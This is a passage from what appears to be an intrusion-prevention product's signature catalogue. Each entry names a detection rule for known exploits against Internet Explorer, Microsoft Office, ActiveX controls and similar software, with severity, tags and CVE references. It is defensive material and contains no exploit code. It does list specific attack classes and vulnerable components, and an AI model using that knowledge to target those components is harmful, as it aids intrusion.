Tags: Windows, x86, Internet Explorer, MS2005-08, CVE2005, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-34-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Internet-Explorer-JPEG-Rendering-Memory-Corruption
Description:
Back to top

HTTP_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability

About this situation: Detects HTML pages trying to use CLSIDs of msoe.dll, chtskdic.dll and imskdic.dll, possible exploit
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2007-05, CVE2006, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
Internet-Explorer-Chtskdic.dll-Com-Object-Instantiation-Memory-Corruption
Description:
Back to top

HTTP_Internet-Explorer-Multiple-Com-Objects-System-Compromise

About this situation: CLSID of an illegal COM object detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2005-08, CVE2005, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-34-1210
Last changed: sgpkg-ips-165-2032
Vulnerability: HTTP-Internet-Explorer-Multiple-Com-Objects-System-Compromise
Description:
Back to top

HTTP_Internet-Explorer-Nested-Object-Tag-Memory-Corruption

About this situation: Detects HTML pages with multiple nested OBJECT tags, possible Internet Explorer exploit
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2006-06, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Internet-Explorer-Nested-Object-Tag-Memory-Corruption
Description:
Back to top

HTTP_Invalid-Header

About this situation: Invalid header
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Invalid header found in multipart/byterange specification.
Back to top

HTTP_Invalid-Location

About this situation: Invalid Location
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Invalid URI in a Location header.
Back to top

HTTP_Invalid-Server-Input

About this situation: Unrequested server input
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Server input not requested by the client.
Back to top

HTTP_Invalid-Server-Protocol-List

About this situation: Invalid protocol specification when switching protocols
Context: HTTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-554-5211
Description: HTTP server responded with status code 101 (Switching Protocols), but either failed to list a subset of protocols in the corresponding HTTP client request, or didn't provide Upgrade header at all. This can result unspecified semantics, and is a violation of HTTP/1.1 specification.
Back to top

HTTP_Invisible-Inline-Frame

About this situation: Detected a hidden inline frame
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: Invisible-Inline-Frame
Description:
Back to top

HTTP_Java-Web-Start-Jnlp-File-Argument-Injection

About this situation: An attempt to exploit a vulnerability in Sun Microsystems JRE detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP_Sun-Java-Web-Start-Jnlp-File-Argument-Injection
Description:
Back to top

HTTP_JPG-Gdiplus-DLL-Comment-Buffer-Overflow

About this situation: Detects jpeg images that will cause a buffer overflow in Windows gdiplus.dll
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2004-09, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-10-1102
Last changed: sgpkg-ips-269-3038
Vulnerability: JPG-Gdiplus-DLL-Comment-Buffer-Overflow
Description:
Back to top

HTTP_Large-Header

About this situation: Header too large
Context: SSM Context
Severity: 8
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A header is over the maximum size.
Back to top

HTTP_Libextractor-ASF-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the GNU libextractor detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libextractor, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Libextractor-Multiple-Heap-Buffer-Overflow-Vulnerabilities
Description:
Back to top

HTTP_Libextractor-Qt-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the GNU libextractor detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libextractor, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Libextractor-Multiple-Heap-Buffer-Overflow-Vulnerabilities
Description:
Back to top

HTTP_Macrovision-InstallShield-Update-Service-Isusweb.dll-Remote-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Macrovision Update Service detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Macrovision Update Service, Macrovision InstallShield, Macrovision FLEXnet Connect, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP_Macrovision-InstallShield-Update-Service-Isusweb.dll-Remote-Buffer-Overflow
Description:
Back to top

HTTP_Malicious-Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link-File

About this situation: Malicious Microsoft Step-by-Step Interactive Training bookmark link was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Step-by-Step Interactive Training, MS2007-02, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link-File-BOF
Description:
Back to top

HTTP_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF

About this situation: Buffer overflow exploit against the McAfee SiteManager.DLL ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, McAfee ProtectionPilot, McAfee ePolicy Orchestrator, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-101-1314
Last changed: sgpkg-ips-342-4219
Vulnerability: HTTP-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF
Description:
Back to top

HTTP_McAfee-Subscription-Manager-ActiveX-Buffer-Overflow

About this situation: Detects HTML pages instantiating a COM object related to McAfee subscription manager
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, McAfee Security Center, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-McAfee-Subscription-Manager-ActiveX-Buffer-Overflow
Description:
Back to top

HTTP_Method

About this situation: Denied method
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Request denied. Method not allowed.
Back to top

HTTP_Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability

About this situation: Attempt to access vulnerabile ActiveX component
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft CAPICOM, Microsoft BizTalk Server, MS2007-05, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability
Description:
Back to top

HTTP_Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow

About this situation: Malicious CHM file detected, possible system compromise
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, Microsoft Outlook, Microsoft Outlook Express, MS2005-06, CVE2005, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: CHM-Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow
Description:
Back to top

HTTP_Microsoft-Embedded-Font-EOT-File-Reference

About this situation: Reference to EOT file in embedded font definition
Context: HTTP Server Stream
Severity: 2
Tags: Windows, x86, MS2006-01, CVE2006, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-54-1210
Last changed: sgpkg-ips-353-4219
Vulnerability: Microsoft-Embedded-Web-Font-Buffer-Overflow
Description:
Back to top

HTTP_Microsoft-Excel-Column-Record-Handling-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS, Any Hardware, Microsoft Excel, MS2007-01, CVE2007, Windows not specific, Mac OS not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Column-Record-Handling-Memory-Corruption
Description:
Back to top

HTTP_Microsoft-Excel-Crafted-Url-Buffer-Overflow

About this situation: Detects malicious Microsoft Excel files with a crafted HLINK record
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Microsoft Excel, MS2006-08, CVE2006, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-71-1314
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Crafted-Url-Buffer-Overflow
Description:
Back to top

HTTP_Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution

About this situation: Detects JavaScript code execution attempts via a Flash object in a crafted Excel file
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Microsoft Excel, MS2006-11, CVE2006, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-71-1314
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Embedded-Shockwave-Flash-Object-Code-Execution
Description:
Back to top

HTTP_Microsoft-Excel-Malformed-Imdata-Record

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel, MS2007-01, CVE2007, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Malformed-Imdata-Record
Description:
Back to top

HTTP_Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2007-01, CVE2007, Windows not specific, Mac OS not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption
Description:
Back to top

HTTP_Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution

About this situation: An attempt to exploit memory corruption vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2007-07, CVE2007, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution
Description:
Back to top

HTTP_Microsoft-Excel-Version-Information-Handling-Code-Execution

About this situation: Attempt to exploit memory corruption vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2007-07, CVE2007, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Version-Information-Handling-Code-Execution
Description:
Back to top

HTTP_Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution

About this situation: Attempt to exploit memory corruption vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2007-07, CVE2007, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution
Description:
Back to top

HTTP_Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Microsoft Help Workshop detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Microsoft Help Workshop, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow
Description:
Back to top

HTTP_Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Help Workshop detected.
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Microsoft Help Workshop, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-248-3038
Vulnerability: Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption

About this situation: CLSID of an illegal COM object detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer 6.0, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption

About this situation: Detects crafted rat files with an excessively long name attribute value
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2005-04, CVE2005, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2006-11, CVE2006, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-79-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution

About this situation: Code execution vulnerability in HTML Help ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2005-01, CVE2004, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition

About this situation: Attempt to exploit cross-site scripting vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-06, CVE2007, Windows not specific, Internet Explorer not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-249-3038
Vulnerability: Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption

About this situation: Microsoft Internet Explorer Marquee Object Handling Memory Corruption detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-04, CVE2009, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-217-2032
Last changed: sgpkg-ips-438-4219
Vulnerability: HTTP_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow

About this situation: Detects MHTML URI buffer overflow exploits against Internet Explorer
Context: HTTP Server Stream
Severity: 2
Tags: Windows, x86, Internet Explorer, MS2006-08, CVE2006, Windows not specific, Internet Explorer not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability

About this situation: A malicious MHTML protocol URI detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2004, CVE2004, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-357-4219
Vulnerability: HTTP-Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption

About this situation: Attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2005-12, CVE2005, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption

About this situation: Attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, x86, Internet Explorer, CVE2007, Windows not specific, Internet Explorer not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-98-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption
Description:
Back to top

HTTP_Microsoft-Internet-Explorer-VML-Buffer-Overrun

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows XP, Windows 2003, Windows XP 64-bit, Windows 2000 SP4, Windows 2003 64-bit, x86, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, MS2007-01, CVE2007, Windows XP not specific, Windows 2003 not specific, Windows XP 64-bit not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-249-3038
Vulnerability: Microsoft-Internet-Explorer-VML-Buffer-Overrun
Description:
Back to top

HTTP_Microsoft-Java-VM-Bytecode-Verifier-Bypass-JAR

About this situation: An attempt to exploit a vulnerability in Microsoft Java VM detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows XP, Windows 95, Windows 98, Windows 2000, Windows ME, Windows NT 4.0, x86, MS2003, CVE2003, Windows XP not specific, Windows 2000 not specific, Windows NT 4.0 not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Java-VM-Bytecode-Verifier-Bypass
Description:
Back to top

HTTP_Microsoft-Jet-Db-Engine-Buffer-Overflow

About this situation: Crafted mdb file detected. Possible exploit against a vulnerability in Microsoft Jet database engine.
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Jet Database Engine, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Jet-Db-Engine-Buffer-Overflow
Description:
Back to top

HTTP_Microsoft-Management-Console-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in the Microsoft Management Console detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows 2000 SP4, Any Hardware, MS2006-08, CVE2006, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-377-4219
Vulnerability: HTTP-Microsoft-Management-Console-Cross-Site-Scripting
Description:
Back to top

HTTP_Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution

About this situation: Attempt to exploit code execution vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Project, Microsoft Visio, Microsoft Office, MS2007-02, CVE2007, Any Operating System not specific, Microsoft Visio not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-102-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution
Description:
Back to top

HTTP_Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution

About this situation: Detects malicious Microsoft PowerPoint files with an invalid value in a vulnerable record
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Microsoft PowerPoint, CVE2006, Windows not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-149-2032
Vulnerability: Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
Description:
Back to top

HTTP_Microsoft-PowerPoint-PPT-Document-Parsing-Exploit

About this situation: Published Microsoft PowerPoint exploit detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Microsoft PowerPoint, CVE2006, Windows not specific, Microsoft PowerPoint not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-149-2032
Vulnerability: Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
Description:
Back to top

HTTP_Microsoft-Visio-Version-Number-Handling-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft Visio was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio, MS2007-06, CVE2007, Windows not specific, Microsoft Visio not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Visio-Version-Number-Handling-Code-Execution
Description:
Back to top

HTTP_Microsoft-Visual-Basic-6.0-Vbp-Project-File-Handling-BOF

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Visual Basic, CVE2007, Windows not specific, Microsoft Visual Studio not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-371-4219
Vulnerability: HTTP_Microsoft-Visual-Basic-6.0-Project-File-Handling-BOF
Description:
Back to top

HTTP_Microsoft-Visual-Foxpro-Vfp6r.dll-Docmd-ActiveX-Control-Command-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Visual FoxPro detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Visual FoxPro, CVE2008, Windows not specific, Microsoft Visual Studio not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP_Microsoft-Visual-Foxpro-Vfp6r.dll-Docmd-ActiveX-Control-Command-Execution
Description:
Back to top

HTTP_Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Control-Usage

About this situation: Detects WMI Object Broker ActiveX Control usage that can be considered suspicious
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Microsoft Visual Studio 2005, MS2006-12, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Code-Execution
Description:
Back to top

HTTP_Microsoft-VM-ActiveX-Component-Vulnerability

About this situation: An attempted access to a Microsoft VM ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft VM, MS2000, CVE2000, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-VM-ActiveX-Component-Vulnerability
Description:
Back to top

HTTP_Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow

About this situation: Detects malicious URL files containing a crafted URL value
